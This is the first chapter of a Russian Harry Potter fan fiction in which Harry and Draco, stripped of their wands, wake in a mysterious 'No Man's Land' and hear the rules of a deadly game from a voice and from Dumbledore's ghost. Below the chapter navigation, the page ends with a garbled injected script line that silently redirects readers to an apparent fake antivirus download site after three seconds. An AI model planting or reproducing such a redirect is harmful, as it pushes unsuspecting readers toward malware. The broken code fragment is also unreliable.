Ничья земля

Автор: Umbridge
Пайринг: Гарри Поттер/Драко Малфой
Рейтинг: NC-17
Жанр: action/agnst/romance
Саммари: Добро пожаловать! Вас приветствует НИЧЬЯ ЗЕМЛЯ! Забудьте все, чем вы были раньше. Здесь нет власти, но есть правила. Соблюдайте их - и вы выиграете!
Предупреждение: гет в 10 и 11 главах. ГП/ДУ, ДМ/НЖП, АУ 7 книги

Глава 1. Добро пожаловать!

(Глава, в которой приключения начинаются, Гарри встречает уважаемое приведение, а Драко приходится обходиться без палочки)

Гарри Поттер с огромным трудом открыл глаза. Над ним застыло блеклое, желтое небо: ни облаков, ни солнца, только бесконечный однотонный купол над головой. Юноша медленно коснулся лица - очки были на месте. Он оторвал спину от земли и с трудом принял более-менее вертикальное положение. Осторожно огляделся и заметил справа от себя человека в плаще и в маске Упивающегося смертью. Тот лежал навзничь, раскинув руки. Вскочив на ноги и расстегнув плащ, Гарри порылся в карманах в поисках палочки, и, не обнаружив ее там, осмотрел все вокруг, пытаясь сообразить, куда она делась. Так и не найдя ответа, Гарри подкрался к распростертой на земле фигуре и сорвал белую маску. «Малфой», - отшатнувшись, прошептал он чуть слышно. Отчего-то, только увидев хорька, гриффиндорец вспомнил события, приведшие его сюда. Непонятно куда.

- Ты должен это сделать! – заявила Гермиона, - ты должен попробовать! Прошел год, как мы пытаемся найти хоркруксы, но все так и не отыскали. Ждать дольше опасно.

- А применять незнакомое заклинание из древней книги, действие которого ты даже толком не разобрала, не опасно? – поинтересовался Гарри в ответ подруге.

- Да… Я… не смогла прочесть, как точно оно работает. - Гермиона смотрела на него в отчаянии. - Этот язык… Он очень древний. Но, в начале там ясно сказано: «Тот, кто произнесет эти слова, получит ответ на любой вопрос».

- Выиграют Чадли Кэннонс в этом сезоне или нет? – предположил Рон, закрыв журнал.

- Нет, Рон. - Гермиона бросила на парня укоряющий взгляд. - Вопрос должен быть действительно серьезным.

- По-твоему, Кэннонс – это несерьезно? - возмутился Рон.

- Гермиона, а что, если ответ на вопрос ты получишь ценой жизни, своей или близкого тебе человека, например? – поинтересовался Гарри.

- Нет! Нет, там все не так просто, - ответила девушка, листая свои записи, – о смерти речь не шла точно. В противном случае нет никакого смысла в этом заклинании.

- Мерлин… - Гарри вздохнул. Положение действительно было отчаянное.

- Соглашайся,- настаивала Гермиона. Она даже пересела поближе к другу, чтобы заглянуть ему в глаза, - у нас нет другого выхода!

Он поверил и в тот же вечер произнес заклинание. Первениро Носцерум Неменис Террум.

И вот он здесь, под бескрайним небом, стоит над телом Драко Малфоя. Гарри огляделся. Вокруг, до самого горизонта, была лишь сухая земля. Ничто не нарушало ее безмятежного покоя. Даже ветер. «Как теперь быть?» - спросил гриффиндорец вслух. Ему было не по себе от тишины, царившей вокруг. - «Что это за место? И почему здесь Малфой?» Гарри задумчиво посмотрел на слизеринского хорька. Тот вдруг открыл глаза. Несколько секунд моргал, а потом улыбнулся.

- Поттер, - сказал он тихо, - ты снова мне снишься.

- Что? – Гарри удивленно поднял брови, внимательно глядя на него сверху вниз. - Я?

- Даааа… Хотя может быть у меня обморок…

- Малфой, ты не спишь, - сухо сказал Гарри, - и ты не в обмороке.

- Да нет, это сон, - продолжал безмятежно улыбаться Драко, - иначе, почему ты здесь, и разговариваешь со мной?

- Понятия не имею, - хмуро ответил тот. – Знаешь что? Ущипни себя. Сделай что-нибудь.

Приподнявшись на локтях, Драко потряс головой, и огляделся.

- Так я не сплю?

- Не спишь.

- И я не в обмороке?

- Насколько я вижу – нет.

- Поттер! – выпалил Драко, вскакивая, и стараясь отыскать палочку. Не найдя ее, он огляделся.

- Поттер! – воскликнул юноша гневно, - где мы?!

Гарри стало легче при мысли, что Малфой тоже остался без палочки. Мальчик-Который-Выжил пожал плечами:

- Не знаю.

- Хватит врать! – крикнул Драко, - это ты виноват! Ты что-то сделал!

- Малфой, перестань орать! – ответил ему Гарри. Однако подумал: «Да уж, сделал. Спасибо Гермионе. Я виноват в том, что оказался здесь. Но Малфой! При чем тут он?» - а вслух продолжил:

- Лучше давай подумаем, что делать дальше. У нас нет палочек…

- Наверное, Поттер, ты украл мою, - выдавил Драко, отступая, - верни…

- Я ничего не крал, - обиделся гриффиндорец, - я сам…

Его прервал голос, обрушившийся на их головы с неба:

- ДОБРО ПОЖАЛОВАТЬ! ВАС ПРИВЕТСТВУЕТ НИЧЬЯ ЗЕМЛЯ! ЗАБУДЬТЕ ВСЕ, ЧЕМ ВЫ БЫЛИ РАНЬШЕ. ЗДЕСЬ НЕТ ВЛАСТИ, НО ЕСТЬ ПРАВИЛА. СОБЛЮДАЙТЕ ИХ И ВЫ ВЫИГРАЕТЕ!

Мальчики замерли, задрав головы и всматриваясь в бесконечный простор. Первым отмер Гарри.

- Кто это? Скажите, кто вы? И где мы находимся?

- ОХ! – вздохнул голос с нескрываемым раздражением, - ИМЕЙТЕ ТЕРПЕНИЕ! КЕМ БЫ ВЫ НИ БЫЛИ В ДРУГОМ МИРЕ, ЗДЕСЬ ВЫ ВСЕГО ЛИШЬ ИГРОКИ. И ВЫИГРАТЬ ВЫ МОЖЕТЕ, ТОЛЬКО ДЕЙСТВУЯ СООБЩА. ПОГИБНЕТ ОДИН – ПОГИБНЕТЕ ОБА!

- Что? – едва слышно прошептал Драко, и гриффиндорец заметил, что тот теперь стоит у него за спиной, - Погибнем?

- ВАМ ПРЕДСТОИТ ПРОЙТИ НЕСКОЛЬКО ИСПЫТАНИЙ. НЕКОТОРЫЕ ПОКАЖУТСЯ ВАМ ПРОСТЫМИ, НЕКОТОРЫЕ НАПУГАЮТ, НО ЗНАЙТЕ: КАЖДОЕ ЗАДАНИЕ СОЗДАНО СПЕЦИАЛЬНО ДЛЯ ВАС, И ТОЛЬКО ПЕРЕСТУПИВ ЧЕРЕЗ СОБСТВЕННЫЕ СТРАХИ И НЕНАВИСТЬ, ТОЛЬКО ОТКРЫВ СВОЕ СЕРДЦЕ, ВЫ НАЙДЕТЕ ВЫХОД!

ИТАК. ПРАВИЛО ПЕРВОЕ: ВЫ НЕ МОЖЕТЕ ВЕРНУТЬСЯ НАЗАД. ВЫБИРАЯ ПУТЬ, ВЫ ВЫБИРАЕТЕ ЕГО ОДИН РАЗ.

ПРАВИЛО ВТОРОЕ: ВЫ НЕ МОЖЕТЕ ОТКАЗАТЬСЯ ОТ ИСПОЛНЕНИЯ ЗАДАНИЯ. ВЫ ПРОХОДИТЕ ЕГО ДО КОНЦА.

ПРАВИЛО ТРЕТЬЕ: СПАСАЯ ДРУГОГО, ВЫ СПАСАЕТЕ СЕБЯ. ВЕРНУТЬСЯ МОЖНО ТОЛЬКО ВМЕСТЕ.

И ЕЩЕ: У КАЖДОГО ИЗ УЧАСТНИКОВ ЕСТЬ ПОМОЩНИК. ЭТО НЕКТО ИЗ МИРА МЕРТВЫХ, ТОТ, КТО ЗНАЕТ ПОДСКАЗКИ. НИКТО ИЗ ЖИВЫХ НЕ СМОЖЕТ ПРОНИКНУТЬ СЮДА И ВЕРНУТЬ ВАС.

УДАЧИ, ГАРРИ ПОТТЕР! ДРАКО МАЛФОЙ!

Произнеся последние слова, голос замолчал. Опустив голову, Гарри посмотрел на сухую землю под ногами. Загадочные правила. Из всего вышесказанного он понял только, что они с Малфоем оказались на Ничьей земле, участвуют в какой-то игре, и могут вернуться, только выиграв. Но при чем тут ответ на его вопрос?

- Поттер… – прошептал Драко, - ты слышал? Мы погибнем!

Гарри вздрогнул и обернулся. Побледневший слизеринец стоял, широко распахнув глаза, полные ужаса. Гарри вздохнул:

-Господи, Малфой! Мы погибнем, только если проиграем. Так что нет смысла заранее убиваться. Давай лучше подумаем, что нам делать дальше. Куда идти. Ведь нам нужна вода и еда. Думаю, мы застряли тут надолго.

- Поттер! – Белокурый юноша поднял брови, - здесь ничего нет, ни воды, ни еды. Мы умрем.

- Ладно, если хочешь. Хотя лично я не готов расстаться с жизнью, поэтому предлагаю пойти, например, направо. Как тебе идея?

Драко с безумной ухмылкой помотал головой:

- Нееет. Я не сдвинусь с места.

- Но нам надо проходить испытания, - развел руками Гарри.

- Я не верю. Это какой-то розыгрыш. Может, это ты меня разыграл, - сказал Драко.

- Я? – Гарри не выдержал и рассмеялся, - Малфой, не знаю, что происходит в настоящем мире, и остался ли он, но в одном я точно уверен – это не розыгрыш.

- Ты можешь сказать все, что угодно, Поттер, - усмехнулся слизеринец, - не знаю, в чем ты там уверен, но я не сдвинусь с места.

- Хорошо, поступай, как знаешь. Я тебе не нянька. Вот только скажи, как ты попал сюда? – поинтересовался Гарри, рассматривая своего неожиданного партнера.

- Ты меня об этом спрашиваешь? – возмутился тот, нервно одергивая плащ.

- Я имею в виду, что ты делал, где был, когда попал сюда, - уточнил гриффиндорец.

- Вот прямо сейчас я все и расскажу. Какое тебе дело? – фыркнул Драко. Похоже, он немного отвлекся от мыслей о смерти.

- Я просто не понимаю, почему именно ты оказался тут, а не кто-нибудь другой. Не Гермиона, например, или не Рон. Не Луна, не Невилл, не Джинни. Да кто угодно. Самый последний хафлпаффец удивил бы меня меньше…

- Ты сравниваешь меня с хафлпаффцами, Поттер?

- Именно. И я предпочел бы любого из них тебе…

- Спасибо… - раздраженно бросил Драко.

- Ладно, - Гарри пожал плечами, - тогда я пошел.

- Плевать, Поттер.

- Хорошо, - кивнул гриффиндорец и, засунув руки в карманы мантии, побрел направо, по направлению к горизонту.

Драко Малфой остался один. Какое-то время он стоял, отвернувшись от удалявшейся фигуры врага. Потом тишина, нарушаемая лишь затихающими шагами, и напряжение, будто пропитавшее воздух, начали действовать ему на нервы. Страх привычно застучал в висках, сдавил грудь. Драко повернулся туда, где все еще виднелась спина Поттера. «Ты уже поставил его на место. Теперь давай, догоняй», - сказал внутренний голос. Слизеринец с облегчением согласился и побежал за Гарри.

- О! Малфой. Что-то забыл? Страшно стало? – усмехнулся тот, когда Драко догнал его и, тяжело дыша, пошел рядом.

- Смешно, Поттер. - Фыркнул он, - Судишь о людях по себе?

- Ну конечно! – ухмыльнулся Гарри.

Драко бросил на него мрачный взгляд:

- Во всем этом, я чувствую, виноват ты, и если это так - я убью тебя.

- Я был бы напуган, но… не убьешь, потому что один отсюда не выберешься. Так сказал голос, - спокойно парировал Гарри, оглядываясь. Он искал признаки близости реки, либо другого места, где можно было при необходимости разжиться водой.

- Не убью, потому что мы быстрее умрем от жажды, - поджал губы слизеринец.

Какое-то время мальчики шли молча. Драко кутался в плащ, периодически посматривал на попутчика, и думал о том, сколько можно прожить без воды. Гарри брел, засунув руки в карманы мантии, не отрывая взгляда от линии горизонта, и размышлял, где и как он должен получить ответ на свой вопрос, когда вокруг, сколько видно глазу, нет никого, кто бы этот ответ дал.

Вдруг Драко остановился.

- Эй, Поттер, смотри! - крикнул он, показывая на что-то слева. Гарри мог ожидать от хорька любого подвоха, но все же обернулся. Небольшое белое облако скользило в их сторону. Оба замерли, внимательно присматриваясь. Облако приближалось, и в какой-то момент гриффиндорец осознал, что перед ними Дамблдор, точнее его призрак, или что там еще. Подлетев на расстояние пары футов, мудрейший волшебник мира остановился и с доброжелательной улыбкой оглядел их.

- Здравствуйте, мальчики, - произнес он, - очень приятно видеть тебя, Гарри, и тебя, Драко. Я – твой помощник, Гарри, тот самый, о ком говорила Ничья земля.

- Сэр! – Гарри сделал шаг вперед. - Вы все-таки мертвы?

- Абсолютно! – улыбка директора стала еще мягче.

- Где мы? Что тут делает Малфой?

- Гарри, всему свое время. Скоро я расскажу тебе то, что ты хотите знать, а пока, - Дамблдор взмахнул рукой и на земле под ногами мальчиков появились небольшой холщовый мешок и кожаная фляга.

- Что это? – подал голос Драко, переводя изумленный взгляд с одного предмета на другой.

- Драко, - старик посмотрел на белокурого юношу сверху вниз, но в его глазах не было высокомерия или презрения, - в мешке еда, только самая необходимая, она будет там всегда, когда бы вы ни захотели есть, а еще вещи, которые могут вам пригодиться. Во фляге вода, и она не иссякнет. - Дамблдор помолчал, задумчиво глядя куда-то поверх голов юных слушателей, потом со вздохом продолжил:

- А теперь постараюсь ответить на твои вопросы, мой мальчик, - призрак улыбнулся Гарри. - То место, где вы находитесь, называется НИЧЬЯ ЗЕМЛЯ. Согласно древним легендам, здесь не властна никакая сила, кроме той, что наполняет эти просторы. Никто из величайших магов и магических существ никогда не мог и не сможет управлять законами Ничьей земли. Она пускает не всех, кто произнесет заклинание, а лишь тех, кого сочтет нужным. Тогда земля дает ему шанс победить, пройдя испытания, и получить ответ на один вопрос. Но испытания нельзя пройти в одиночку, только в паре с другим магом. Кем будет второй игрок, нельзя предугадать. Но выбор не случаен. Известно, что именно выбранный маг один во всем волшебном мире обладает теми качествами, которые помогут первому игроку выиграть. Но для этого второй игрок должен смирить гордыню во имя общего блага, посмотреть в глаза правде своего сердца и наступить на горло страху. В противном случае проиграют оба.

- Что ты несешь, глупый старик! Нет никакой правды в моем сердце! – воскликнул Драко.

- Драко, - Дамблдор покачал головой, - никто не слышал, чтобы Ничья земля ошибалась, но если ошиблась… Что ж… Значит, вы оба останетесь здесь навсегда.

- Сэр! То есть я должен рассчитывать на него? – Гарри с негодованием ткнул пальцем в сторону Драко.

- И сделаешь большую ошибку! – прошипел тот.

- Гарри, Драко, желаю вам удачи, - бывший директор Хогвардса погладил бороду, - запомните все, что я сказал.

Гарри хотел задать еще множество вопросов, но Дамблдор исчез, а оттуда, где он только что парил, на юношу смотрело только тяжелое желтое небо.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>